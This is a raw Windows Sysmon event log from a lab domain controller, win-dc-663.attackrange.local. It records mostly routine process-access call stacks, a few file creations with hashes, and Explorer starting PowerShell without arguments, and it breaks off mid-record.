21:06:59.421{4DB9351A-9DDE-60D3-1600-00000000CF01}12921340C:\Windows\system32\svchost.exe{4DB9351A-A273-60D3-3D05-00000000CF01}5832C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022765Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.421{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022764Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.415{4DB9351A-9F2C-60D3-D000-00000000CF01}50642580C:\Windows\Explorer.EXE{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022763Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.415{4DB9351A-9F2C-60D3-D000-00000000CF01}50642580C:\Windows\Explorer.EXE{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022762Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.399{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A273-60D3-3E05-00000000CF01}4896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022761Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.383{4DB9351A-9F2C-60D3-D000-00000000CF01}50645672C:\Windows\Explorer.EXE{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000022760Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.383{4DB9351A-9F2C-60D3-D000-00000000CF01}50645672C:\Windows\Explorer.EXE{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 23542300x800000000000000022759Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.383{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C33C2A103546A1098ED6481A4BD6DDD,SHA256=F635CE4CC70B128AAFA0E8A5D1150DF4276760D7C39F7206DC6F3F1C8F3F807F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022758Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.368{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A273-60D3-3E05-00000000CF01}4896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022757Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.368{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084872C:\Windows\system32\csrss.exe{4DB9351A-A273-60D3-3D05-00000000CF01}5832C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022756Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.368{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A273-60D3-3E05-00000000CF01}4896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022755Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.368{4DB9351A-A273-60D3-3B05-00000000CF01}6872NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\C6RHKKNS5R\Microsoft.Build.Framework.ni.dll.auxMD5=95BB4BF9FC14CDD93D81453E270CD8FB,SHA256=4874F6FF74DB2A5C19A49EBA0C972C5334382FD51BD122B5BF848E14EF9578D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022754Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.368{4DB9351A-A273-60D3-3B05-00000000CF01}6872NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\C6RHKKNS5R\Microsoft.Build.Framework.ni.dllMD5=D73CC39D8C1DEB2EC7009DAAAA60571A,SHA256=929E00DD2CF505269D5820E35B6FB5CDE0CDBD89F3AFDC2BF99674D98D2AA64F,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022753Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.368{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022752Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.368{4DB9351A-9F2C-60D3-D000-00000000CF01}50644928C:\Windows\Explorer.EXE{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022751Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.368{4DB9351A-9F2C-60D3-D000-00000000CF01}50644928C:\Windows\Explorer.EXE{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022750Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.368{4DB9351A-9F2C-60D3-D000-00000000CF01}50642580C:\Windows\Explorer.EXE{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022749Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.352{4DB9351A-9F2C-60D3-D000-00000000CF01}50642580C:\Windows\Explorer.EXE{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022748Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.352{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022747Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.352{4DB9351A-9F2B-60D3-C900-00000000CF01}42322492C:\Windows\system32\taskhostw.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022746Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.352{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022745Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.352{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022744Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.352{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022743Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.352{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022742Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.352{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084724C:\Windows\system32\csrss.exe{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022741Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.352{4DB9351A-9F2C-60D3-D000-00000000CF01}50644904C:\Windows\Explorer.EXE{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+9070f|C:\Windows\System32\windows.storage.dll+90385|C:\Windows\System32\windows.storage.dll+8fe76|C:\Windows\System32\windows.storage.dll+912e8|C:\Windows\System32\windows.storage.dll+8fc9e|C:\Windows\System32\windows.storage.dll+92ab5|C:\Windows\System32\windows.storage.dll+92e34|C:\Windows\System32\windows.storage.dll+92470|C:\Windows\System32\windows.storage.dll+94c4a|C:\Windows\System32\windows.storage.dll+94a02|C:\Windows\System32\SHELL32.dll+3f98d|C:\Windows\System32\SHELL32.dll+3e526|C:\Windows\System32\SHELL32.dll+802b1|C:\Windows\System32\SHELL32.dll+6724e|C:\Windows\System32\windows.storage.dll+11a32|C:\Windows\System32\windows.storage.dll+11729|C:\Windows\System32\windows.storage.dll+115ff|C:\Windows\System32\SHELL32.dll+80337|C:\Windows\System32\SHELL32.dll+6724e|C:\Windows\System32\SHELL32.dll+17432f 154100x800000000000000022740Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.356{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Users\Administrator\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 10341000x800000000000000022739Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.336{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A273-60D3-3B05-00000000CF01}6872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022738Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 